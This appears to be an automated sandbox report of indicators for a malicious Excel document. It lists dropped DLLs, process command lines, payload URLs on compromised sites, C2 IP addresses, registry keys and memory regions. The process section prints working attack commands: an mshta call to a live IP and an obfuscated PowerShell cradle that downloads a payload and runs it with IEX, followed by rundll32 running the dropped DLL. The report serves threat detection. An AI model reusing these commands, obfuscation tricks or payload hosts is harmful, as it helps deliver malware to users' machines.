IOC Report

loading gif

Files

File Path
Type
Category
Malicious
imedpub_2.xls
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 11:58:35 2022, Last Saved Time/Date: Thu Jan 27 13:02:02 2022, Security: 0
initial sample
malicious
C:\ProgramData\QWER.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\Desktop\imedpub_2.xls
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 11:58:35 2022, Last Saved Time/Date: Thu Jan 27 13:02:02 2022, Security: 0
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm
data
downloaded
C:\Users\user\AppData\Local\Temp\48F2.tmp
Composite Document File V2 Document, Cannot read section info
dropped
C:\Users\user\AppData\Local\Temp\~DF0A9EAC97075E8A20.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DF81471AFDD24A7D20.TMP
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2HUD8O4FXE81UE2DXS2A.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
data
dropped
C:\Windows\SysWOW64\Vnljigstknrhjwnk\pagi.wrr (copy)
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
malicious
C:\Windows\System32\cmd.exe
cmd /c mshta http://91.240.118.168/zqqw/zaas/fe.html
malicious
C:\Windows\System32\mshta.exe
mshta http://91.240.118.168/zqqw/zaas/fe.html
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zqqw/zaas/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vnljigstknrhjwnk\pagi.wrr",GtcFgrxeupAr
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vnljigstknrhjwnk\pagi.wrr",DllRegisterServer
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qglmgufuicllvuzt\zdvyw.osp",fdhAQGhe
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qglmgufuicllvuzt\zdvyw.osp",DllRegisterServer
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kwvpkzxruoppyhz\jflthedjndgf.dni",MzSrktOhCbVh
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kwvpkzxruoppyhz\jflthedjndgf.dni",DllRegisterServer
malicious
There are 3 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://haileywells.com/cgi-bin/KJUOaq/PE3
unknown
malicious
http://praachichemfood.com/wp-content/themes/brooklyn/images/default/fav-114.png
unknown
malicious
https://onewaymedia.ro/wp-includ
unknown
malicious
https://lodev7.com/wp-content/dp
unknown
malicious
http://praachichemfood.com/public_html/SWmteCWBUkA89/PE3
unknown
malicious
http://www.praachichemfood.com/wp-content/themes/brooklyn/css/ut.theme.min.css?ver=4.9.7.2
unknown
malicious
https://www.praachichemfood.com/wp-json/
unknown
malicious
http://bakultante.com/tee5oeot/Q
unknown
malicious
http://praachichemfood.com/wp-content/themes/brooklyn/images/default/fav-57.png
unknown
malicious
https://dtmconsulting.ca/wp-includes/dkCFwyE/
162.241.211.118
malicious
http://praachichemfood.com/wp-content/themes/brooklyn/images/default/fav-32.png
unknown
malicious
https://onewaymedia.ro/wp-includes/k/PE3
unknown
malicious
http://91.240.118.168/zqqw/zaas/fe.htmlW59wo
unknown
malicious
http://praachichemfood.com/public_html/SWmteCWBUkA89/
103.138.189.128
malicious
https://trochoi80club.com/wp-content/6shnRU/
unknown
malicious
http://www.praachichemfood.com
unknown
malicious
https://www.yepproject.org/wp-in
unknown
malicious
http://www.praachichemfood.com/wp-content/themes/brooklyn/js/ut-scriptlibrary.min.js?ver=4.9.7.2
unknown
malicious
http://www.praachichemfood.com/wp-content/themes/brooklyn/css/ut.core.plugins.min.css?ver=5.9
unknown
malicious
http://praachichemfood.com/publi
unknown
malicious
http://91.240.118.168/zqqw/zaas/
unknown
malicious
http://estiloindustria.com.br/wp-content/49cRLeDYqr6uVF7i/
unknown
malicious
http://91.240.118.168/zqqw/zaas/fe.png
91.240.118.168
malicious
http://estiloindustria.com.br/wp
unknown
malicious
https://dtmconsulting.ca
unknown
malicious
http://91.240.118.168/zqqw/zaas/fe.pngPE3
unknown
malicious
https://worldaviationhub.com/wp-
unknown
malicious
https://worldaviationhub.com/wp-includes/Lik/PE3
unknown
malicious
https://dtmconsulting.ca/wp-includes/dkCFwyE/PE3
unknown
malicious
http://www.praachichemfood.com/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=6.5
unknown
malicious
https://www.praachichemfood.com/feed/
unknown
malicious
http://www.praachichemfood.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.5.4
unknown
malicious
https://futurelube.com/wp-admin/
unknown
malicious
http://91.240.118.168/zqqw/zaas/fe.htmlE59em
unknown
malicious
http://91.240.118.168/zqqw/zaas/fe.html
91.240.118.168
malicious
http://91.240.118.168/zqqw/zaas/fe.htmlEL
unknown
malicious
https://worldaviationhub.com/wp-includes/Lik/
unknown
malicious
http://www.praachichemfood.com/xmlrpc.php
unknown
malicious
http://www.praachichemfood.com/wp-content/plugins/ut-shortcodes/js/plugins/modernizr/modernizr.min.j
unknown
malicious
https://futurelube.com/wp-admin/6GLpl4ehsdCBX3z/
unknown
malicious
http://www.praachichemfood.com/wp-content/plugins/mystickyelements/css/mystickyelements-front.min.cs
unknown
malicious
https://trochoi80club.com/wp-content/6shnRU/PE3
unknown
malicious
https://mortgageadviser.directory/xw8ok/icCYdBSpbFrf5s/
unknown
malicious
http://91.240.11
unknown
malicious
https://trochoi80club.com/wp-con
unknown
malicious
http://www.praachichemfood.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
unknown
malicious
http://bakultante.com/tee5oeot/Q/PE3
unknown
malicious
http://91.240.118.168/zqqw/zaas/fe.htmlP41yl
unknown
malicious
https://lodev7.com/wp-content/dpwjiJivrpgO1F2/
unknown
malicious
http://91.240.118.168/zqqw/zaas/fe.htmlN
unknown
malicious
http://91.240.118.168/zqqw/zaas/fe.htmlWinSta0
unknown
malicious
http://www.praachichemfood.com/wp-content/themes/brooklyn/css/ut.core.fonts.min.css?ver=5.9
unknown
malicious
http://www.praachichemfood.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.0
unknown
malicious
https://futurelube.com/wp-admin/6GLpl4ehsdCBX3z/PE3
unknown
malicious
http://91.240.118.168/zqqw/zaas/fe.htmlB
unknown
malicious
https://haileywells.com/cgi-bin/KJUOaq/
unknown
malicious
https://www.yepproject.org/wp-includes/lC45zFsHmmsMDElKT/
unknown
malicious
http://estiloindustria.com.br/wp-content/49cRLeDYqr6uVF7i/PE3
unknown
malicious
http://91.240.118.168/zqqw/zaas/fe.htmlP
unknown
malicious
https://haileywells.com/cgi-bin/
unknown
malicious
http://www.praachichemfood.com/wp-includes/wlwmanifest.xml
unknown
malicious
https://www.praachichemfood.com/comments/feed/
unknown
malicious
http://praachichemfood.com/wp-content/themes/brooklyn/images/default/fav-144.png
unknown
malicious
https://dtmconsulting.ca/wp-incl
unknown
malicious
http://www.praachichemfood.com/wp-content/themes/brooklyn/style.css?ver=4.9.7.2
unknown
malicious
http://91.240.118.168/zqqw/zaas/fe.htmlHEAP_SIGNATURE4
unknown
malicious
http://91.240.118.168/zqqw/zaas/fe.htmlmshta
unknown
malicious
http://bakultante.com/tee5oeot/Q/
unknown
malicious
https://www.yepproject.org/wp-includes/lC45zFsHmmsMDElKT/PE3
unknown
malicious
https://www.praachichemfood.com/xmlrpc.php?rsd
unknown
malicious
https://onewaymedia.ro/wp-includes/k/
unknown
malicious
http://91.240.118.168/zqqw/zaas/fe.html.0
unknown
malicious
https://mortgageadviser.directory/xw8ok/icCYdBSpbFrf5s/PE3
unknown
malicious
http://praachichemfood.com
unknown
malicious
http://www.praachichemfood.com/wp-content/themes/brooklyn/css/ut.shortcode.min.css?ver=5.9
unknown
malicious
http://www.praachichemfood.com/wp-content/themes/brooklyn/css/ut.vc.shortcodes.min.css?ver=5.9
unknown
malicious
http://91.240.118.168/zqqw/zaas/fe.htmlhttp://91.240.118.168/zqqw/zaas/fe.html
unknown
malicious
http://91.240.118.168
unknown
malicious
https://lodev7.com/wp-content/dpwjiJivrpgO1F2/PE3
unknown
malicious
http://praachichemfood.com/wp-content/themes/brooklyn/images/default/fav-72.png
unknown
malicious
http://www.praachichemfood.com/wp-content/plugins/mystickyelements/css/font-awesome.min.css?ver=2.0.
unknown
malicious
http://91.240.118.168/zqqw/zaas/fe.htmlfunction
unknown
malicious
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
http://www.diginotar.nl/cps/pkioverheid0
unknown
https://lodev7.c
unknown
http://www.protware.com
unknown
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
unknown
http://crl.entrust.net/2048ca.crl0
unknown
https://mortgageadviser.director
unknown
http://ocsp.entrust.net03
unknown
http://www.protware.com&wa
unknown
https://gmpg.org/xfn/11
unknown
http://www.protware.com/
unknown
http://ocsp.entrust.net0D
unknown
http://crl.entrust.net/server1.crl0
unknown
https://api.w.org/
unknown
https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js
unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
unknown
http://www.piriform.com/ccleaner
unknown
https://secure.comodo.com/CPS0
unknown
There are 90 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
dtmconsulting.ca
162.241.211.118
praachichemfood.com
103.138.189.128
www.praachichemfood.com
unknown

IPs

IP
Domain
Country
Malicious
195.154.133.20
unknown
France
malicious
185.157.82.211
unknown
Poland
malicious
212.237.17.99
unknown
Italy
malicious
79.172.212.216
unknown
Hungary
malicious
110.232.117.186
unknown
Australia
malicious
173.214.173.220
unknown
United States
malicious
212.24.98.99
unknown
Lithuania
malicious
138.185.72.26
unknown
Brazil
malicious
178.63.25.185
unknown
Germany
malicious
160.16.102.168
unknown
Japan
malicious
81.0.236.90
unknown
Czech Republic
malicious
103.75.201.2
unknown
Thailand
malicious
216.158.226.206
unknown
United States
malicious
45.118.115.99
unknown
Indonesia
malicious
51.15.4.22
unknown
France
malicious
159.89.230.105
unknown
United States
malicious
162.214.50.39
unknown
United States
malicious
91.240.118.168
unknown
unknown
malicious
200.17.134.35
unknown
Brazil
malicious
217.182.143.207
unknown
France
malicious
107.182.225.142
unknown
United States
malicious
51.38.71.0
unknown
France
malicious
45.118.135.203
unknown
Japan
malicious
50.116.54.215
unknown
United States
malicious
131.100.24.231
unknown
Brazil
malicious
46.55.222.11
unknown
Bulgaria
malicious
41.76.108.46
unknown
South Africa
malicious
173.212.193.249
unknown
Germany
malicious
45.176.232.124
unknown
Colombia
malicious
178.79.147.66
unknown
United Kingdom
malicious
212.237.5.209
unknown
Italy
malicious
162.243.175.63
unknown
United States
malicious
176.104.106.96
unknown
Serbia
malicious
207.38.84.195
unknown
United States
malicious
164.68.99.3
unknown
Germany
malicious
192.254.71.210
unknown
United States
malicious
212.237.56.116
unknown
Italy
malicious
104.168.155.129
unknown
United States
malicious
45.142.114.231
unknown
Germany
malicious
203.114.109.124
unknown
Thailand
malicious
209.59.138.75
unknown
United States
malicious
159.8.59.82
unknown
United States
malicious
129.232.188.93
unknown
South Africa
malicious
58.227.42.236
unknown
Korea Republic of
malicious
158.69.222.101
unknown
Canada
malicious
104.251.214.46
unknown
United States
malicious
103.138.189.128
praachichemfood.com
India
162.241.211.118
dtmconsulting.ca
United States
There are 38 hidden IPs, click here to show them.

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|6.
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\2E714
2E714
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
zb.
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\3515B
3515B
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\357FF
357FF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\151\52C64B7E
@%SystemRoot%\system32\qagentrt.dll,-10
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\151\52C64B7E
@%SystemRoot%\System32\fveui.dll,-843
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\151\52C64B7E
@%SystemRoot%\System32\fveui.dll,-844
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\151\52C64B7E
@%SystemRoot%\System32\wuaueng.dll,-400
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
There are 71 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
28F1000
trusted library allocation
page execute read
malicious
2621000
trusted library allocation
page execute read
malicious
320000
trusted library allocation
page execute and read and write
malicious
331000
trusted library allocation
page execute read
malicious
2C1000
trusted library allocation
page execute read
malicious
761000
trusted library allocation
page execute read
malicious
2580000
trusted library allocation
page execute and read and write
malicious
7F0000
trusted library allocation
page execute and read and write
malicious
411000
trusted library allocation
page execute read
malicious
C41000
trusted library allocation
page execute read
malicious
AD1000
trusted library allocation
page execute read
malicious
1B0000
trusted library allocation
page execute and read and write
malicious
2480000
trusted library allocation
page execute and read and write
malicious
2F91000
trusted library allocation
page execute read
malicious
A71000
trusted library allocation
page execute read
malicious
140000
trusted library allocation
page execute and read and write
malicious
200000
trusted library allocation
page execute and read and write
malicious
2FC1000
trusted library allocation
page execute read
malicious
2670000
trusted library allocation
page execute and read and write
malicious
10001000
unkown
page execute read
malicious
AE0000
trusted library allocation
page execute and read and write
malicious
25F0000
trusted library allocation
page execute and read and write
malicious
261000
trusted library allocation
page execute read
malicious
290000
trusted library allocation
page execute and read and write
malicious
10001000
unkown
page execute read
malicious
9D0000
trusted library allocation
page execute and read and write
malicious
10001000
unkown
page execute read
malicious
AB1000
trusted library allocation
page execute read
malicious
351000
trusted library allocation
page execute read
malicious
B40000
trusted library allocation
page execute and read and write
malicious
710000
trusted library allocation
page execute and read and write
malicious
241000
trusted library allocation
page execute read
malicious
25C1000
trusted library allocation
page execute read
malicious
A80000
trusted library allocation
page execute and read and write
malicious
4F1000
trusted library allocation
page execute read
malicious
181000
trusted library allocation
page execute read
malicious
420000
trusted library allocation
page execute and read and write
malicious
821000
trusted library allocation
page execute read
malicious
10001000
unkown
page execute read
malicious
4C0000
trusted library allocation
page execute and read and write
malicious
2FD1000
trusted library allocation
page execute read
malicious
310000
trusted library allocation
page execute and read and write
malicious
371000
trusted library allocation
page execute read
malicious
140000
trusted library allocation
page execute and read and write
malicious
211000
trusted library allocation
page execute read
malicious
AA0000
trusted library allocation
page execute and read and write
malicious
7C1000
trusted library allocation
page execute read
malicious
3E0000
trusted library allocation
page execute and read and write
malicious
2F60000
trusted library allocation
page execute and read and write
malicious
2F10000
trusted library allocation
page execute and read and write
malicious
10001000
unkown
page execute read
malicious
10001000
unkown
page execute read
malicious
10001000
unkown
page execute read
malicious
3151000
trusted library allocation
page execute read
malicious
10001000
unkown
page execute read
malicious
2870000
trusted library allocation
page execute and read and write
malicious
2F50000
trusted library allocation
page execute and read and write
malicious
220000
trusted library allocation
page execute and read and write
malicious
25F1000
trusted library allocation
page execute read
malicious
4A1000
trusted library allocation
page execute read
malicious
1D0000
trusted library allocation
page execute and read and write
malicious
300000
trusted library allocation
page execute and read and write
malicious
29F1000
trusted library allocation
page execute read
malicious
790000
trusted library allocation
page execute and read and write
malicious
27B1000
trusted library allocation
page execute read
malicious
201000
trusted library allocation
page execute read
malicious
32F8000
heap
page read and write
3347000
heap
page read and write
1DA7000
trusted library allocation
page read and write
47A4000
trusted library allocation
page read and write
2E0E000
trusted library allocation
page read and write
44A5000
heap
page read and write
2E0E000
trusted library allocation
page read and write
2E40000
trusted library allocation
page read and write
34B0000
trusted library allocation
page read and write
1F4000
heap
page read and write
9CE000
stack
page read and write
2C9B000
trusted library allocation
page read and write
2F9E000
stack
page read and write
2EC5000
trusted library allocation
page read and write
1F97000
trusted library allocation
page read and write
B40000
trusted library allocation
page read and write
29FC000
stack
page read and write
33A9000
heap
page read and write
47A4000
trusted library allocation
page read and write
1D81000
trusted library allocation
page read and write
1D81000
trusted library allocation
page read and write
23C6000
trusted library allocation
page read and write
1DA7000
trusted library allocation
page read and write
7FF00042000
trusted library allocation
page execute and read and write
37B000
heap
page read and write
1DA4000
trusted library allocation
page read and write
33B1000
heap
page read and write
4798000
trusted library allocation
page read and write
536000
heap
page read and write
349000
heap
page read and write
399000
heap
page read and write
81FE000
trusted library allocation
page read and write
33EF000
heap
page read and write
565000
heap
page read and write
8F0000
heap
page read and write
4798000
trusted library allocation
page read and write
10046000
unkown
page readonly
23DD000
trusted library allocation
page read and write
27FA000
trusted library allocation
page read and write
790000
trusted library allocation
page read and write
269C000
stack
page read and write
382000
heap
page read and write
350000
trusted library allocation
page read and write
1D90000
trusted library allocation
page read and write
28F0000
trusted library allocation
page read and write
33C7000
heap
page read and write
2A0000
heap
page read and write
2DEB000
trusted library allocation
page read and write
2A20000
trusted library allocation
page read and write
56D000
heap
page read and write
23CC000
trusted library allocation
page read and write
2DE8000
trusted library allocation
page read and write
33B7000
heap
page read and write
1FB5000
trusted library allocation
page read and write
5EA000
heap
page read and write
47B0000
trusted library allocation
page read and write
1DA7000
trusted library allocation
page read and write
339D000
heap
page read and write
28EE000
stack
page read and write
2770000
trusted library allocation
page read and write
4798000
trusted library allocation
page read and write
236C000
trusted library allocation
page read and write
2E0C000
trusted library allocation
page read and write
2690000
trusted library section
page read and write
44B4000
heap
page read and write
34FB000
stack
page read and write
3339000
heap
page read and write
3390000
heap
page read and write
2770000
trusted library allocation
page read and write
2E0E000
trusted library allocation
page read and write
224000
trusted library allocation
page read and write
2E40000
trusted library allocation
page read and write
2E20000
trusted library allocation
page read and write
2DE0000
trusted library allocation
page read and write
2FF4000
trusted library allocation
page read and write
2C9B000
trusted library allocation
page read and write
2FD0000
trusted library allocation
page read and write
236C000
trusted library allocation
page read and write
236C000
trusted library allocation
page read and write
28F0000
heap
page read and write
A94000
trusted library allocation
page read and write
25E0000
trusted library allocation
page read and write
554000
heap
page read and write
1DA4000
trusted library allocation
page read and write
44E6000
heap
page read and write
2C9B000
trusted library allocation
page read and write
E4000
heap
page read and write
23A000
heap
page read and write
28F0000
trusted library allocation
page read and write
2F90000
trusted library allocation
page read and write
A6F000
stack
page read and write
1D64000
trusted library allocation
page read and write
3361000
heap
page read and write
2DF0000
trusted library allocation
page read and write
44E6000
heap
page read and write
2E4000
trusted library allocation
page read and write
390000
heap
page read and write
7FF00052000
trusted library allocation
page execute and read and write
1D90000
trusted library allocation
page read and write
33B5000
heap
page read and write
1F8B000
trusted library allocation
page read and write
3471000
trusted library allocation
page read and write
2DE9000
trusted library allocation
page read and write
2FF3000
trusted library allocation
page read and write
44ED000
heap
page read and write
2F1000
stack
page read and write
33ED000
heap
page read and write
234000
trusted library allocation
page read and write
47A4000
trusted library allocation
page read and write
47B0000
trusted library allocation
page read and write
2910000
trusted library allocation
page read and write
25BE000
stack
page read and write
373000
trusted library allocation
page read and write
CB000
stack
page read and write
10000
heap
page read and write
E0000
heap
page read and write
1F8D000
trusted library allocation
page read and write
47B0000
trusted library allocation
page read and write
8DBE000
trusted library allocation
page read and write
26C0000
trusted library allocation
page read and write
31A0000
trusted library allocation
page read and write
28D000
stack
page read and write
1D90000
trusted library allocation
page read and write
2005000
heap
page read and write
28AE000
stack
page read and write
1DA4000
trusted library allocation
page read and write
2FC0000
trusted library allocation
page read and write
338E000
heap
page read and write
1FA5000
trusted library allocation
page read and write
1DA7000
trusted library allocation
page read and write
820000
trusted library allocation
page read and write
1D54000
trusted library allocation
page read and write
3376000
heap
page read and write
1DA4000
trusted library allocation
page read and write
2250000
heap
page read and write
2590000
trusted library allocation
page read and write
1FB5000
trusted library allocation
page read and write
7FFFFF00000
trusted library allocation
page execute and read and write
54A000
heap
page read and write
2F90000
heap
page read and write
8DAE000
